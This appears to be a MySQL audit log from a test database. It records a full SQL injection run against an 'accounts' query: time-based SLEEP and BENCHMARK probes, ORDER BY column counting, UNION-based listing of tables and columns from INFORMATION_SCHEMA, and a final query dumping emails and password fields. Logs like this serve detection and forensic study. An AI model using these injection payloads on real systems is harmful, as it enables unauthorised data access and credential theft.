{"audit_record":{"name":"Query","record":"14768_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"191","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14769_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"191","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14770_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"192","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14771_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"192","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14772_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"192","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14773_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"193","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14774_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"193","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1;SELECT SLEEP(5)#","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14775_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"193","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14776_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"194","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14777_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"194","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1;SELECT SLEEP(5)","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14778_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"194","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14779_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"195","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14780_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"195","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1;(SELECT * FROM (SELECT(SLEEP(5)))btLq)#","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14781_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"195","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14782_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"196","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14783_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"196","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1;(SELECT * FROM (SELECT(SLEEP(5)))Iood)","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14784_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"196","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14785_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"197","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14786_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"197","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1;SELECT BENCHMARK(5000000,MD5(0x79524470))#","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14787_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"197","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14788_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"198","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14789_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","command_class":"select","connection_id":"198","status":1064,"sqltext":"SELECT * FROM accounts WHERE account_id=1;SELECT BENCHMARK(5000000,MD5(0x41486c73))","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14790_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"198","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14791_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:24 UTC","connection_id":"199","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14792_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:29 UTC","command_class":"select","connection_id":"199","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND SLEEP(5)","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14793_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:29 UTC","connection_id":"199","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14794_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:29 UTC","connection_id":"200","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14795_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:29 UTC","command_class":"select","connection_id":"200","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND SLEEP(0)","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14796_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:29 UTC","connection_id":"200","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14797_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:29 UTC","connection_id":"201","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14798_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"201","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 AND SLEEP(5)","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14799_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"201","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14800_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"202","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14801_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"202","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 ORDER BY 1-- KFSZ","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14802_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"202","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14803_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"203","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14804_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"203","status":1054,"sqltext":"SELECT * FROM accounts WHERE account_id=1 ORDER BY 2890-- zZdL","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14805_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"203","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14806_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"204","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14807_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"204","status":1054,"sqltext":"SELECT * FROM accounts WHERE account_id=1 ORDER BY 10-- QUFe","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14808_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"204","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14809_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"205","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14810_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"205","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 ORDER BY 6-- VBKi","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14811_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"205","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14812_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"206","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14813_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"206","status":1054,"sqltext":"SELECT * FROM accounts WHERE account_id=1 ORDER BY 8-- ovzg","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14814_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"206","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14815_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"207","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14816_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"207","status":1054,"sqltext":"SELECT * FROM accounts WHERE account_id=1 ORDER BY 7-- YduW","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14817_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"207","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14818_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"208","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14819_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"208","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,0x5a656d4a61567878716b7545585a6a556d4b676977656a764f4f454a6e6572437154465256624672,0x716a787a71),NULL,NULL,NULL-- LZEc","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14820_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"208","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14821_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"209","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14822_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"209","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,0x5a656d4a61567878716b7545585a6a556d4b676977656a764f4f454a6e6572437154465256624672,0x716a787a71),NULL,NULL,NULL UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,0x4b464e787a6e504f72424d4f4d414d4b685a4a4672794f5a68445a5146514a684d6a7665564c4275,0x716a787a71),NULL,NULL,NULL-- WhCn","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14823_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"209","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14824_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"210","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14825_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"210","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x716a787a71),NULL,NULL,NULL-- Ofoj","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14826_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"210","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14827_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"211","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14828_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"211","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,IFNULL(CAST(table_name AS CHAR),0x20),0x716a787a71),NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x746573746462)-- yUec","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14829_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"211","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14830_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"212","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14831_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"212","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,IFNULL(CAST(column_name AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(column_type AS CHAR),0x20),0x716a787a71),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6163636f756e7473 AND table_schema=0x746573746462-- pnRR","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14832_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"212","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Connect","record":"14833_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"213","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
{"audit_record":{"name":"Query","record":"14834_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","command_class":"select","connection_id":"213","status":0,"sqltext":"SELECT * FROM accounts WHERE account_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767171,IFNULL(CAST(account_added AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(account_email AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(account_id AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(account_lastactive AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(account_pass AS CHAR),0x20),0x617a776a7a6e,IFNULL(CAST(role_id AS CHAR),0x20),0x716a787a71),NULL,NULL,NULL FROM testdb.accounts-- XVAV","user":"test-user[test-user] @ localhost []","host":"localhost","os_user":"","ip":"","db":"testdb"}}
{"audit_record":{"name":"Quit","record":"14835_2017-04-26T17:30:31","timestamp":"2017-04-26T18:53:34 UTC","connection_id":"213","status":0,"user":"test-user","priv_user":"test-user","os_login":"","proxy_user":"","host":"localhost","ip":"","db":"testdb"}}
